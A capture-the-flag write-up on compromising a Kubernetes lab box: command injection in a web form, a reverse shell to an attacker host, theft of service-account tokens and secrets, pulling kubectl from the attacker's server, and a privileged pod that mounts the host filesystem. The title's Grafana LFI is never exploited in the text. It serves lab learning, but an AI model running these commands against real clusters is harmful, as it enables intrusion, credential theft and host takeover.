Exploiting Kubernetes by leveraging a Grafana LFI vulnerability


Spin up the box and connect to the VPN. Let's start by seeing which ports are open on the machine.

nmap -T4 <machine-ip>
# Host is up (0.093s latency).
# Not shown: 998 closed tcp ports (conn-refused)
# 22/tcp open  ssh
# 80/tcp open  http

SSH and HTTP. Let's see what's on the webpage.


Let's try some basic command injection

localhost; whoami

We get the output challenge, which means we have remote code execution!
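Presumably the form splices our input into a shell command on the server side. A minimal sketch of why the `;` works (the handler below is an assumption, not the actual challenge source):

```shell
# Hypothetical server-side handler (an assumption, not the real challenge
# code): the form value is interpolated into a shell command unsanitized,
# so a ';' ends the intended command and starts one of our own.
USER_INPUT='localhost; whoami'
sh -c "echo pinging $USER_INPUT"
```

The first line of output is the intended command's result; the second is whatever our injected command prints.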

Running localhost; env returns a list of all the environment variables, and the flag is among them.

Let's create a reverse shell to see what else is there. On our attacking machine (a Docker container in my case), create a listener.

nc -lvnp 8080

In the webpage, insert the following into the form: localhost; sh -i >& /dev/tcp/<attacker-ip>/8080 0>&1

We know we're running inside a container from the environment variables. Let's see if there is a service account attached to the pod.

ls -l /var/run/secrets/kubernetes.io/serviceaccount/
# lrwxrwxrwx 1 root root 13 Jan 20 22:05 ca.crt -> ..data/ca.crt
# lrwxrwxrwx 1 root root 16 Jan 20 22:05 namespace -> ..data/namespace
# lrwxrwxrwx 1 root root 12 Jan 20 22:05 token -> ..data/token
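The token file holds a JWT for the pod's service account; the middle dot-separated segment is base64-encoded JSON naming the account. A quick sketch with a fabricated token (a real token's payload decodes the same way, though real JWTs use unpadded base64url):

```shell
# Fabricated token for illustration only: real service-account tokens have
# the same three-part JWT shape, and the payload segment decodes to JSON
# identifying the service account.
PAYLOAD=$(printf '%s' '{"sub":"system:serviceaccount:default:default"}' | base64 -w0)
TOKEN="fakeheader.${PAYLOAD}.fakesignature"
printf '%s' "$TOKEN" | cut -d. -f2 | base64 -d
# {"sub":"system:serviceaccount:default:default"}
```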

Since the kubectl binary is not installed, let's try hitting the API server directly with curl.

export TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)

curl -s https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}/version  --header "Authorization: Bearer $TOKEN" --cacert /var/run/secrets/kubernetes.io/serviceaccount/ca.crt
# {....}

curl -s https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}/apis/authorization.k8s.io/v1/selfsubjectrulesreviews  --header "Authorization: Bearer $TOKEN" --cacert /var/run/secrets/kubernetes.io/serviceaccount/ca.crt
# Failure

Too much work. Instead, I'm going to copy the kubectl binary from my local machine to the container.

curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
python3 -m http.server 9000 -d .

Back in the container

mkdir /tmp/foo
cd /tmp/foo
curl -o kubectl http://<attacker-ip>:9000/kubectl
chmod +x /tmp/foo/kubectl

We can now easily see what permissions we have with the following command

/tmp/foo/kubectl auth can-i --list
# Resources                                       Non-Resource URLs                     Resource Names   Verbs
# selfsubjectaccessreviews.authorization.k8s.io   []                                    []               [create]
# selfsubjectrulesreviews.authorization.k8s.io    []                                    []               [create]
# secrets                                         []                                    []               [get list]

We can get and list secrets.
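Worth remembering before pulling them: Secret data values are base64-encoded, not encrypted, so reading them is just a decode away (the value below is a made-up example):

```shell
# Secret 'data' fields are base64-encoded, not encrypted; decoding recovers
# the plaintext. 'supersecretvalue' is a made-up example value.
ENCODED=$(printf '%s' 'supersecretvalue' | base64)
printf '%s' "$ENCODED" | base64 -d
# supersecretvalue
```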

Side note: adding the -v 10 flag to kubectl prints the raw API requests it makes, which helped me piece together the curl call for the auth endpoint

curl -X POST -s https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}/apis/authorization.k8s.io/v1/selfsubjectrulesreviews \
--header "Authorization: Bearer $TOKEN" \
--cacert /var/run/secrets/kubernetes.io/serviceaccount/ca.crt \
-H "Content-Type: application/json" \
-d '{"kind":"SelfSubjectRulesReview","apiVersion":"authorization.k8s.io/v1","metadata":{"creationTimestamp":null},"spec":{"namespace":"default"},"status":{"resourceRules":null,"nonResourceRules":null,"incomplete":false}}'

Let's see what secrets are there

/tmp/foo/kubectl get secrets
# NAME                    TYPE                                  DATA   AGE
# default-token-8q4vp     kubernetes.io/service-account-token   3      323d
# developer-token-rnmqz   kubernetes.io/service-account-token   3      323d
# secretflag              Opaque                                1      323d
# syringe-token-6w8tq     kubernetes.io/service-account-token   3      323d

/tmp/foo/kubectl get secrets secretflag -o=jsonpath='{.data.flag}' | base64 --decode
# flag{}
/tmp/foo/kubectl get secrets developer-token-rnmqz -o yaml
apiVersion: v1
data:
  ca.crt: ...
  namespace: ZGVmYXVsdA==
  token: ...
kind: Secret
metadata:
  annotations:
    kubernetes.io/service-account.name: developer
    kubernetes.io/service-account.uid: b01b0879-ce02-4014-b612-129eec0167b4
  creationTimestamp: "2023-03-02T23:51:55Z"
  name: developer-token-rnmqz
  namespace: default
  resourceVersion: "865"
  uid: 88dbd00f-c67d-4799-bb66-4e10c4cd809a
type: kubernetes.io/service-account-token

The developer-token secret contains the token used to authenticate against the API server as the developer service account. Let's see what permissions that account has.

export K8S_TOKEN=`/tmp/foo/kubectl get secrets developer-token-rnmqz -o=jsonpath='{.data.token}' | base64 -d`
/tmp/foo/kubectl --token=$K8S_TOKEN auth can-i --list
# Resources                                       Non-Resource URLs                     Resource Names   Verbs
# *.*                                             []                                    []               [*]
#                                                 [*]                                   []               [*]
# selfsubjectaccessreviews.authorization.k8s.io   []                                    []               [create]
# selfsubjectrulesreviews.authorization.k8s.io    []                                    []               [create]

All verbs on all resources: this service account can do anything in the cluster!

Let's see what else is running, using the new token

/tmp/foo/kubectl --token=$K8S_TOKEN get pods
# NAME                       READY   STATUS    RESTARTS       AGE
# grafana-57454c95cb-f9js5   1/1     Running   2 (323d ago)   323d
# syringe-79b66d66d7-6xdjz   1/1     Running   2 (323d ago)   323d

/tmp/foo/kubectl --token=$K8S_TOKEN exec -it grafana-57454c95cb-f9js5 -- env
# flag{}

The flag could also be found by running this command

/tmp/foo/kubectl --token=$K8S_TOKEN get pods grafana-57454c95cb-f9js5 -o yaml | grep flag

Let's see what image it's running, and then look up which CVEs it could be vulnerable to.

/tmp/foo/kubectl --token=$K8S_TOKEN get pods grafana-57454c95cb-f9js5 -o yaml | grep image

Now let's get host access. Since we have full cluster access, it should be easy.


Bishop Fox's badPods repo has an example manifest that mounts the host's root directory into a pod. Let's pull it onto our local machine

wget https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml

Edit everything-allowed-exec-pod.yaml and change the image to grafana/grafana-enterprise:8.3.0-beta2, which is already present on the node since another pod is running it.
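For reference, after the image swap the manifest looks roughly like this (reconstructed from the badPods repo; the upstream file may differ in minor details):

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: everything-allowed-exec-pod
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: everything-allowed-pod
    image: grafana/grafana-enterprise:8.3.0-beta2   # swapped-in image
    securityContext:
      privileged: true
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
    volumeMounts:
    - mountPath: /host        # the node's root filesystem appears here
      name: noderoot
  volumes:
  - name: noderoot
    hostPath:
      path: /
```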

Note: I ran into an issue where the default ubuntu image did not seem to be available on the instance, hence the image swap.

python3 -m http.server 9000 -d .

Back in the container, let's create the pod resource, pulling the manifest from our local machine.

/tmp/foo/kubectl --token=$K8S_TOKEN apply -f http://<attacker-ip>:9000/everything-allowed-exec-pod.yaml

Now we can exec into it and see what files are on the host machine.

/tmp/foo/kubectl --token=$K8S_TOKEN exec -it everything-allowed-exec-pod --container everything-allowed-pod -- bash

ls -l /host/root
# total 4
# -rw-rw-r--    1 1000     1000            39 Jan  6  2022 root.txt

cat /host/root/root.txt
# flag{}